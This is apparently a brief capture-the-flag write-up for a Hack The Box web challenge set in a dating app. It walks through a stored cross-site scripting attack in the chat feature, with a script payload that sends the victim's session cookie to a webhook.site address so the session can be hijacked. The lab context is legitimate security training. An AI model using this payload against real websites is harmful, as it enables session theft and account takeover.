https://app.hackthebox.com/challenges/860

Description

Dating and matching can be exciting especially during Valentine’s, but it’s important to stay vigilant for impostors. Can you help identify possible frauds?

Exploitation

Register and log in, then navigate to Matches to start a conversation.

Begin the conversation with:

Hello, how are you?

Set up a webhook by obtaining a link from https://webhook.site/ and replace the provided link with your unique one.

Demonstrate an xss by saying:

Hello there `<script>document.location='https://webhook.site/YOUR-UNIQUE-ID?c='+document.cookie</script>`

Lastly, paste the captured cookie into the designated page and refresh.

Summary

OnlyHacks: use the client-side injection path to steal the needed proof and recover the flag.